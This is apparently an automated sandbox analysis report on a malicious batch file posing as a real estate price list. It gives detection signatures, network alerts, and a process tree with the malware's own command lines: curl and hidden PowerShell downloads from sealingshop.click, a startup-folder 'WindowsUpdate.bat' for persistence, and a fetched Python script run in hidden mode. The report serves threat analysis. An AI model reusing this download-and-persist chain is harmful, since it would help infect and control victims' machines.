Edit tour
Windows
Analysis Report
Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat
Overview
General Information
Sample name: | Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat |
Analysis ID: | 1568178 |
MD5: | 85b266cd4025ee21be3143314a4aec33 |
SHA1: | 3fadc615f950cab3bedd4af1cff07fe0854e475f |
SHA256: | c40d41df6e12280dc1b2730abc5d22552e3985be871d43ae3f174d7976678653 |
Tags: | batuser-smica83 |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
AI detected suspicious sample
Drops script or batch files to the startup folder
Found large BAT file
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 2352 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\Real Estate Pro ject Infor mation - C atalogue - Price Lis t 0412PH ( Area - Des ign - Fina nce).bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2076 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 1964 cmdline:
curl https ://sealing shop.click /bat/encod e/rose_tie n_en.txt?a =342234ere rerefdgdsj fwiowjefis jidfsojfoi js45435443 25445344ei ofujoisued sfdddddjjj jkfoisuefo iu43453434 3iosuioeuf iosuio4534 5354354334 4444345345 645745suef iosuieofus oiufiosefu ioeuio -o "C:\\Users \\Public\\ libs.bat" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - chrome.exe (PID: 6484 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// google.com / MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 7064 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2212 --fi eld-trial- handle=215 6,i,112196 4505849443 7623,14001 8914731560 78966,2621 44 --disab le-feature s=Optimiza tionGuideM odelDownlo ading,Opti mizationHi nts,Optimi zationHint sFetching, Optimizati onTargetPr ediction / prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - powershell.exe (PID: 984 cmdline:
powershell -windowst yle hidden Invoke-We bRequest - URI https: //sealings hop.click/ config/stu -OutFile "C:\\Users \\$([Envir onment]::U serName)\\ AppData\\R oaming\\Mi crosoft\\W indows\\'S tart Menu' \\Programs \\Startup\ \WindowsUp date.bat"; MD5: 04029E121A0CFA5991749937DD22A1D9) - curl.exe (PID: 8072 cmdline:
curl https ://sealing shop.click /app/pytho n39.zip -o "C:\\User s\\Public\ \python39\ \python39. zip" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - powershell.exe (PID: 6528 cmdline:
powershell -windowst yle hidden Expand-Ar chive C:\\ Users\\Pub lic\\pytho n39\\pytho n39.zip -D estination Path C:\\U sers\\Publ ic\\python 39 MD5: 04029E121A0CFA5991749937DD22A1D9) - curl.exe (PID: 6416 cmdline:
curl https ://sealing shop.click /py/rose_t ien -o "C: \\Users\\P ublic\\pyt hon39\\doc uments.py" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - python.exe (PID: 1436 cmdline:
C:\\Users\ \Public\\p ython39\\p ython.exe "C:\\Users \\Public\\ python39\\ documents. py" MD5: D1888CDE122FF5031E57EB5CE8D1C0B3)
- svchost.exe (PID: 6204 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cmd.exe (PID: 7736 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\Microso ft\Windows \Start Men u\Programs \Startup\W indowsUpda te.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2780 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7864 cmdline:
cmd /c pow ershell.ex e -windows tyle hidde n C:\\User s\\Public\ \python39\ \python C: \\Users\\P ublic\\pyt hon39\\doc uments.py; MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 1308 cmdline:
powershell .exe -wind owstyle hi dden C:\\U sers\\Publ ic\\python 39\\python C:\\Users \\Public\\ python39\\ documents. py; MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Subhash Popuri (@pbssubhash): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-04T12:20:01.878537+0100 | 2052959 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 104.21.36.187 | 443 | TCP |
2024-12-04T12:20:12.236455+0100 | 2052959 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 104.21.36.187 | 443 | TCP |
2024-12-04T12:20:19.463493+0100 | 2052959 | 1 | A Network Trojan was detected | 192.168.2.5 | 49733 | 104.21.36.187 | 443 | TCP |
2024-12-04T12:21:43.613902+0100 | 2052959 | 1 | A Network Trojan was detected | 192.168.2.5 | 49995 | 104.21.36.187 | 443 | TCP |
2024-12-04T12:21:58.243329+0100 | 2052959 | 1 | A Network Trojan was detected | 192.168.2.5 | 50030 | 104.21.36.187 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-04T12:20:00.399886+0100 | 2052958 | 1 | A Network Trojan was detected | 192.168.2.5 | 61287 | 1.1.1.1 | 53 | UDP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | Integrated Neural Analysis Model: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | File created: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Software Vulnerabilities |
---|
Source: | Child: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |